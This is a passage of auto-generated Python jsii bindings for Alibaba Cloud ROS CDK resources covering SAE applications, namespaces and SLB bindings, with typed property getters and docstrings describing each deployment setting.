def app_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
    '''appName: Application name. Letters, digits and underscores, starting with a letter; at most 36 characters. Required.'''
    value = self._values.get("app_name")
    assert value is not None, "Required property 'app_name' is missing"
    return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)
@builtins.property
def cpu(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
    '''cpu: CPU per instance, in milli-cores; must be non-zero. Only fixed-specification instance types are supported. Required.'''
    value = self._values.get("cpu")
    assert value is not None, "Required property 'cpu' is missing"
    return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], value)
@builtins.property
def memory(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
    '''memory: Memory per instance, in MB; must be non-zero. Only fixed-specification instance types are supported. Required.'''
    value = self._values.get("memory")
    assert value is not None, "Required property 'memory' is missing"
    return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], value)
@builtins.property
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
    '''namespaceId: ID of the target EDAS namespace; obtainable via DescribeNamespaceList. Required.

    NOTE(review): upstream wording is garbled — presumably lowercase letters only,
    starting with a letter; confirm against the SAE API reference.
    '''
    value = self._values.get("namespace_id")
    assert value is not None, "Required property 'namespace_id' is missing"
    return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)
@builtins.property
def package_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
    '''packageType: Application package type; one of FatJar, War or Image. Required.'''
    value = self._values.get("package_type")
    assert value is not None, "Required property 'package_type' is missing"
    return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)
@builtins.property
def replicas(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
    '''replicas: Initial number of instances. Required.'''
    value = self._values.get("replicas")
    assert value is not None, "Required property 'replicas' is missing"
    return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], value)
@builtins.property
def app_description(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''appDescription: Application description; at most 1024 characters. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("app_description"),
    )
@builtins.property
def command(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''command: Image start command; must be an executable available inside the container (e.g. sleep). Setting it overrides the image's original start command. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("command"),
    )
@builtins.property
def command_args(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''commandArgs: Arguments for the start command, e.g. ["1d"]. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("command_args"),
    )
@builtins.property
def custom_host_alias(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''customHostAlias: Custom host-to-IP mappings inside the container, e.g. [{"hostName": "samplehost", "ip": "127.0.0.1"}]. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("custom_host_alias"),
    )
@builtins.property
def deploy(
    self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
    '''deploy: Whether the deployment takes effect immediately; defaults to false. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
        self._values.get("deploy"),
    )
@builtins.property
def edas_container_version(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''edasContainerVersion: Version of the EDAS Pandora runtime used by the application. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("edas_container_version"),
    )
@builtins.property
def envs(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''envs: Container environment variables, e.g. [{"name": "envtmp", "value": "0"}]. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("envs"),
    )
@builtins.property
def image_url(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''imageUrl: Image address; only Image-type applications may set this. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("image_url"),
    )
@builtins.property
def jar_start_args(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''jarStartArgs: Startup arguments for a JAR package application. Optional.

    Default start command: $JAVA_HOME/bin/java $JarStartOptions -jar $CATALINA_OPTS "$package_path" $JarStartArgs
    '''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("jar_start_args"),
    )
@builtins.property
def jar_start_options(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''jarStartOptions: Startup options for a JAR package application. Optional.

    Default start command: $JAVA_HOME/bin/java $JarStartOptions -jar $CATALINA_OPTS "$package_path" $JarStartArgs
    '''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("jar_start_options"),
    )
@builtins.property
def jdk(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''jdk: JDK version the deployment package depends on; not supported for Image deployments. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("jdk"),
    )
@builtins.property
def liveness(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''liveness: Container liveness probe; a container that fails the check is killed and recovered. Only in-container commands are supported, e.g. {"exec": {"command": ["sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("liveness"),
    )
@builtins.property
def mount_desc(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''mountDesc: Mount description. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("mount_desc"),
    )
@builtins.property
def mount_host(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''mountHost: NAS mount point within the application's VPC. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("mount_host"),
    )
@builtins.property
def nas_id(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''nasId: ID of the NAS to mount; it must be in the same region as the cluster and have an available mount point (or one already in the VPC). If omitted while mountDesc is set, a NAS is purchased and mounted onto the vSwitch in the VPC automatically. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("nas_id"),
    )
@builtins.property
def package_url(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''packageUrl: Deployment package address; only FatJar or War applications may set this. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("package_url"),
    )
@builtins.property
def package_version(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''packageVersion: Version of the deployment package; required for War and FatJar types. Any meaningful custom value is accepted. Optional here.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("package_version"),
    )
@builtins.property
def post_start(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''postStart: Script executed after start, e.g. {"exec": {"command": "cat", "/ etc / group"}}. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("post_start"),
    )
@builtins.property
def pre_stop(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''preStop: Script executed before stopping, e.g. {"exec": {"command": "cat", "/ etc / group"}}. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("pre_stop"),
    )
@builtins.property
def readiness(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''readiness: Application readiness probe; containers that fail repeatedly are killed and restarted, and containers that fail do not receive SLB traffic. Example: {"exec": {"command": ["sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("readiness"),
    )
@builtins.property
def security_group_id(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''securityGroupId: Security group ID. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("security_group_id"),
    )
@builtins.property
def sls_configs(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''slsConfigs: Log collection configuration. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("sls_configs"),
    )
@builtins.property
def tags(self) -> typing.Optional[typing.List[RosApplication.TagsProperty]]:
    '''tags: Tags attached to the application; at most 20 at creation time. Each tag has a Key (required) and a Value. Optional.'''
    return typing.cast(
        typing.Optional[typing.List[RosApplication.TagsProperty]],
        self._values.get("tags"),
    )
@builtins.property
def timezone(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''timezone: Application time zone; defaults to Asia/Shanghai. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("timezone"),
    )
@builtins.property
def vpc_id(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''vpcId: VPC corresponding to the EDAS namespace. Optional.

    NOTE(review): upstream wording is garbled — it appears that in serverless mode a
    namespace maps to exactly one VPC (bound by the first application created and not
    modifiable afterwards), and omitting this uses the VPC already bound to the
    namespace; confirm against the SAE API reference.
    '''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("vpc_id"),
    )
@builtins.property
def v_switch_id(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''vSwitchId: vSwitch hosting the application instances' elastic network interfaces; must be in the VPC above and bound to the EDAS namespace. If omitted, the vSwitch already bound to the namespace is used. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("v_switch_id"),
    )
@builtins.property
def war_start_options(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''warStartOptions: Startup options for a War package application. Optional.

    Default start command (as documented upstream, wording garbled):
    java $JAVA_OPTS $CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$" start
    '''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("war_start_options"),
    )
@builtins.property
def web_container(
    self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
    '''webContainer: Tomcat version the deployment package depends on; not supported for Image deployments. Optional.'''
    return typing.cast(
        typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
        self._values.get("web_container"),
    )
def __eq__(self, rhs: typing.Any) -> builtins.bool:
    '''Props objects compare equal when they are of the same class and hold the same values.'''
    if not isinstance(rhs, self.__class__):
        return False
    return self._values == rhs._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
    '''Inequality is defined as the negation of equality.'''
    return not (rhs == self)
def __repr__(self) -> str:
    '''Debug representation listing every stored property value.'''
    fields = ", ".join(f"{key}={value!r}" for key, value in self._values.items())
    return "RosApplicationProps(%s)" % fields
class RosNamespace(
    ros_cdk_core.RosResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@alicloud/ros-cdk-sae.RosNamespace",
):
    '''A ROS template type: ``ALIYUN::SAE::Namespace``.

    Low-level (L1) binding generated by jsii; all behavior is delegated to the
    underlying JavaScript implementation through the jsii kernel.
    '''

    def __init__(
        self,
        scope: ros_cdk_core.Construct,
        id: builtins.str,
        props: "RosNamespaceProps",
        enable_resource_property_constraint: builtins.bool,
    ) -> None:
        '''Create a new ``ALIYUN::SAE::Namespace``.

        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param props: - resource properties.
        :param enable_resource_property_constraint: -
        '''
        # Construction is delegated to the jsii kernel, which instantiates the
        # underlying implementation with the given constructor arguments.
        jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])

    @jsii.member(jsii_name="renderProperties")
    def _render_properties(
        self,
        props: typing.Mapping[builtins.str, typing.Any],
    ) -> typing.Mapping[builtins.str, typing.Any]:
        '''Render the resource properties for template synthesis.

        :param props: -
        '''
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))

    @jsii.python.classproperty # type: ignore[misc]
    @jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
    def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
        '''The resource type name for this resource class.'''
        return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrNamespaceId")
    def attr_namespace_id(self) -> ros_cdk_core.IResolvable:
        '''
        :Attribute: NamespaceId: Namespace ID
        '''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrNamespaceId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="rosProperties")
    def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
        # Raw property bag as held by the underlying jsii object.
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="enableResourcePropertyConstraint")
    def enable_resource_property_constraint(self) -> builtins.bool:
        # Whether property-constraint validation is enabled for this resource.
        return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))

    @enable_resource_property_constraint.setter
    def enable_resource_property_constraint(self, value: builtins.bool) -> None:
        jsii.set(self, "enableResourcePropertyConstraint", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="namespaceId")
    def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''
        :Property: namespaceId: Namespace ID. Format: "regionId:logicalId" or "logicalId"
        '''
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "namespaceId"))

    @namespace_id.setter
    def namespace_id(
        self,
        value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "namespaceId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="namespaceName")
    def namespace_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''
        :Property: namespaceName: Namespace name
        '''
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "namespaceName"))

    @namespace_name.setter
    def namespace_name(
        self,
        value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "namespaceName", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="namespaceDescription")
    def namespace_description(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: namespaceDescription: Namespace description
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "namespaceDescription"))

    @namespace_description.setter
    def namespace_description(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "namespaceDescription", value)
@jsii.data_type(
    jsii_type="@alicloud/ros-cdk-sae.RosNamespaceProps",
    jsii_struct_bases=[],
    name_mapping={
        "namespace_id": "namespaceId",
        "namespace_name": "namespaceName",
        "namespace_description": "namespaceDescription",
    },
)
class RosNamespaceProps:
    def __init__(
        self,
        *,
        namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        namespace_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        namespace_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    ) -> None:
        '''Properties for defining a ``ALIYUN::SAE::Namespace``.

        :param namespace_id: namespace ID ("regionId:logicalId" or "logicalId").
        :param namespace_name: namespace name.
        :param namespace_description: optional namespace description.
        '''
        # Store required values up front; optional ones only when supplied, so
        # absent keys and explicit None are treated identically by the getters.
        values: typing.Dict[str, typing.Any] = {
            "namespace_id": namespace_id,
            "namespace_name": namespace_name,
        }
        if namespace_description is not None:
            values["namespace_description"] = namespace_description
        self._values: typing.Dict[str, typing.Any] = values

    @builtins.property
    def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''namespaceId: Namespace ID; format "regionId:logicalId" or "logicalId". Required.'''
        value = self._values.get("namespace_id")
        assert value is not None, "Required property 'namespace_id' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)

    @builtins.property
    def namespace_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''namespaceName: Namespace name. Required.'''
        value = self._values.get("namespace_name")
        assert value is not None, "Required property 'namespace_name' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)

    @builtins.property
    def namespace_description(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''namespaceDescription: Namespace description. Optional.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("namespace_description"),
        )

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        '''Props objects compare equal when they are of the same class and hold the same values.'''
        if not isinstance(rhs, self.__class__):
            return False
        return self._values == rhs._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        '''Inequality is defined as the negation of equality.'''
        return not (rhs == self)

    def __repr__(self) -> str:
        '''Debug representation listing every stored property value.'''
        fields = ", ".join(f"{key}={value!r}" for key, value in self._values.items())
        return "RosNamespaceProps(%s)" % fields
class RosSlbBinding(
    ros_cdk_core.RosResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@alicloud/ros-cdk-sae.RosSlbBinding",
):
    '''A ROS template type: ``ALIYUN::SAE::SlbBinding``.

    Low-level (L1) binding generated by jsii; all behavior is delegated to the
    underlying JavaScript implementation through the jsii kernel.
    '''

    def __init__(
        self,
        scope: ros_cdk_core.Construct,
        id: builtins.str,
        props: "RosSlbBindingProps",
        enable_resource_property_constraint: builtins.bool,
    ) -> None:
        '''Create a new ``ALIYUN::SAE::SlbBinding``.

        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param props: - resource properties.
        :param enable_resource_property_constraint: -
        '''
        # Construction is delegated to the jsii kernel, which instantiates the
        # underlying implementation with the given constructor arguments.
        jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])

    @jsii.member(jsii_name="renderProperties")
    def _render_properties(
        self,
        props: typing.Mapping[builtins.str, typing.Any],
    ) -> typing.Mapping[builtins.str, typing.Any]:
        '''Render the resource properties for template synthesis.

        :param props: -
        '''
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))

    @jsii.python.classproperty # type: ignore[misc]
    @jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
    def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
        '''The resource type name for this resource class.'''
        return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrAppId")
    def attr_app_id(self) -> ros_cdk_core.IResolvable:
        '''
        :Attribute: AppId: Successful application deployment target ID
        '''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrChangeOrderId")
    def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
        '''
        :Attribute: ChangeOrderId: Return to release a single ID, used to query task execution status.
        '''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="rosProperties")
    def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
        # Raw property bag as held by the underlying jsii object.
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="appId")
    def app_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''
        :Property: appId: Successful application deployment target ID
        '''
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "appId"))

    @app_id.setter
    def app_id(
        self,
        value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "appId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="enableResourcePropertyConstraint")
    def enable_resource_property_constraint(self) -> builtins.bool:
        # Whether property-constraint validation is enabled for this resource.
        return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))

    @enable_resource_property_constraint.setter
    def enable_resource_property_constraint(self, value: builtins.bool) -> None:
        jsii.set(self, "enableResourcePropertyConstraint", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="internet")
    def internet(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: internet: Binding public SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "internet"))

    @internet.setter
    def internet(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "internet", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="internetSlbId")
    def internet_slb_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: internetSlbId: Use SLB purchased specified, currently only supports non-shared examples
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "internetSlbId"))

    @internet_slb_id.setter
    def internet_slb_id(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "internetSlbId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="intranet")
    def intranet(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: intranet: Bind private SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "intranet"))

    @intranet.setter
    def intranet(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "intranet", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="intranetSlbId")
    def intranet_slb_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "intranetSlbId"))

    @intranet_slb_id.setter
    def intranet_slb_id(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "intranetSlbId", value)
@jsii.data_type(
    jsii_type="@alicloud/ros-cdk-sae.RosSlbBindingProps",
    jsii_struct_bases=[],
    name_mapping={
        "app_id": "appId",
        "internet": "internet",
        "internet_slb_id": "internetSlbId",
        "intranet": "intranet",
        "intranet_slb_id": "intranetSlbId",
    },
)
class RosSlbBindingProps:
    def __init__(
        self,
        *,
        app_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        internet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        internet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        intranet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        intranet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    ) -> None:
        '''Properties for defining a ``ALIYUN::SAE::SlbBinding``.

        :param app_id: target application ID.
        :param internet: public SLB binding specification.
        :param internet_slb_id: ID of a purchased public SLB instance.
        :param intranet: private SLB binding specification.
        :param intranet_slb_id: ID of a purchased private SLB instance.
        '''
        # Store the required value up front; optional ones only when supplied, so
        # absent keys and explicit None are treated identically by the getters.
        values: typing.Dict[str, typing.Any] = {
            "app_id": app_id,
        }
        optional_entries = (
            ("internet", internet),
            ("internet_slb_id", internet_slb_id),
            ("intranet", intranet),
            ("intranet_slb_id", intranet_slb_id),
        )
        for key, supplied in optional_entries:
            if supplied is not None:
                values[key] = supplied
        self._values: typing.Dict[str, typing.Any] = values

    @builtins.property
    def app_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''appId: ID of the successfully deployed target application. Required.'''
        value = self._values.get("app_id")
        assert value is not None, "Required property 'app_id' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)

    @builtins.property
    def internet(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''internet: Public SLB binding, e.g. [{"port": 80, "targetPort": 8080, "protocol": "TCP"}] exposes container port 8080 through SLB port 80 over TCP; blank entries are ignored. Optional.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("internet"),
        )

    @builtins.property
    def internet_slb_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''internetSlbId: ID of a purchased public SLB instance to use; only non-shared instances are currently supported. Optional.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("internet_slb_id"),
        )

    @builtins.property
    def intranet(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''intranet: Private SLB binding, e.g. [{"port": 80, "targetPort": 8080, "protocol": "TCP"}] exposes container port 8080 through SLB port 80 over TCP; blank entries are ignored. Optional.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("intranet"),
        )

    @builtins.property
    def intranet_slb_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''intranetSlbId: ID of a purchased private SLB instance to use; only non-shared instances are currently supported. Optional.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("intranet_slb_id"),
        )

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        '''Props objects compare equal when they are of the same class and hold the same values.'''
        if not isinstance(rhs, self.__class__):
            return False
        return self._values == rhs._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        '''Inequality is defined as the negation of equality.'''
        return not (rhs == self)

    def __repr__(self) -> str:
        '''Debug representation listing every stored property value.'''
        fields = ", ".join(f"{key}={value!r}" for key, value in self._values.items())
        return "RosSlbBindingProps(%s)" % fields
class SlbBinding(
    ros_cdk_core.Resource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@alicloud/ros-cdk-sae.SlbBinding",
):
    '''A ROS resource type: ``ALIYUN::SAE::SlbBinding``.

    Higher-level (L2) construct wrapping the ``RosSlbBinding`` template type;
    behavior is delegated to the underlying implementation via the jsii kernel.
    '''

    def __init__(
        self,
        scope: ros_cdk_core.Construct,
        id: builtins.str,
        props: "SlbBindingProps",
        enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
    ) -> None:
        '''Create a new ``ALIYUN::SAE::SlbBinding``.

        Param scope - scope in which this resource is defined
        Param id - scoped id of the resource
        Param props - resource properties

        :param scope: -
        :param id: -
        :param props: -
        :param enable_resource_property_constraint: -
        '''
        # Construction is delegated to the jsii kernel, which instantiates the
        # underlying implementation with the given constructor arguments.
        jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrAppId")
    def attr_app_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute AppId: Successful application deployment target ID.'''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrChangeOrderId")
    def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute ChangeOrderId: Return to release a single ID, used to query task execution status.'''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))
@jsii.data_type(
    jsii_type="@alicloud/ros-cdk-sae.SlbBindingProps",
